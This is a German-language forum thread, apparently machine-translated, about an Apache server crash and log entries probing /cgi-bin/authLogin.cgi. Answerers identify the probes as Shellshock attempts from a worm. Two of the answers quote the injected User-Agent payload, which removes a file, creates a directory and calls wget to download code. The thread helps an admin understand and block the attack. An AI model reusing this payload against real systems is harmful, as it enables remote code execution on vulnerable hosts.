Apache http server funktioniert nicht mehr
Hallo Freunde,
Ich bin mit Ampps-server mit php 5.3.29, in windows server datacenter.
leider bin ich immer die folgende Meldung im windows server und meine Website down.
Titel der Eingabeaufforderung:
Microsoft windows
Fenster Mit Der Meldung:
Apache http server funktioniert nicht mehr.
Ein problem verursacht das Programm nicht mehr ordnungsgemäß funktioniert. das Programm wird geschlossen und Sie werden benachrichtigt wenn eine Lösung verfügbar ist.
Trace:
Wenn ich tracing-error und access logs, fand ich die folgenden Protokolle als Ursache.
In Apache-access-log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
Im Apache-error-log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Dateien/Ampps/www/cgi-bin/authLogin.cgi
Bitte helfen Sie mir.
InformationsquelleAutor karuppub | 2014-12-10
Du musst angemeldet sein, um einen Kommentar abzugeben.
Es ist ein Web-bot versucht zu bekommen, Behörde, so kann es wget und führen Sie so etwas wie S0.py, die ich vorstellen, dass ist ein Wurm, so dass die download-server kompromittiert ist.
Id gerne eine Kopie S0.sh wenn Sie geschehen, um einen zu bekommen, geben Sie es an, exploit-db oder etwas ähnliches.
Die geschickte Befehl ist:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Die Datei ausgeführt wird, folgenden download.
Ich nehme an, es gibt etwas über HDB_DATA, die ich gar nicht haben.
"Information ist oberstes Gebot!"
InformationsquelleAutor Mutified
Wenn Sie versuchen, diese Datei zu öffnen, was passiert?
D:/Program Dateien/Ampps/www/cgi-bin/authLogin.cgi
Zeigt die Meldung, dass die Datei nicht vorhanden ist, wie dies durch die 404-Fehler und die Meldung "script not found".
InformationsquelleAutor NicholasDTC
Schließlich verweigerte ich diesen client für den Zugriff auf die cgi-bin-Verzeichnis.
im cgi-bin-Verzeichnis erstellt habe ich eine .htaccess-Datei
Fügte ich folgende Zeile in .htaccess
Deny From all.
InformationsquelleAutor karuppub
Ich glaube nicht, dass authLogin.cgi wirklich wichtig, ausser es kann jemand erlauben, um Sie auszuführen. Das problem ist, dass der Benutzer versucht oder erfolgreich beseitigt /tmp/S0.sh und erstellen Sie ein Verzeichnis php in den Ordner freigeben, und führen Sie dann wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Hier ist, was kam, nachdem alle, die Zeit der Fragen:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh besteht aus zwei teilen ... der erste Teil macht die erste Einrichtung und downloads zusätzliche Programme, und dann den zweiten Teil installiert sich der Wurm und führt einige zusätzliche Befehle."
Also es war ein echtes Vergnügen, den Fang dieser Aktion und zunächst wusste niemand zu nennen Shellshock. Es ist eine Kopie S0.sh es, und Sie können sehen, es ist ein Wurm, der ich vermutete, der Fall war.
Von was ich gelesen habe, wird der Wurm nur beim surfen auf den IP-Adressraum auf der Suche für jedermann, das hören auf port 8080.
InformationsquelleAutor mutified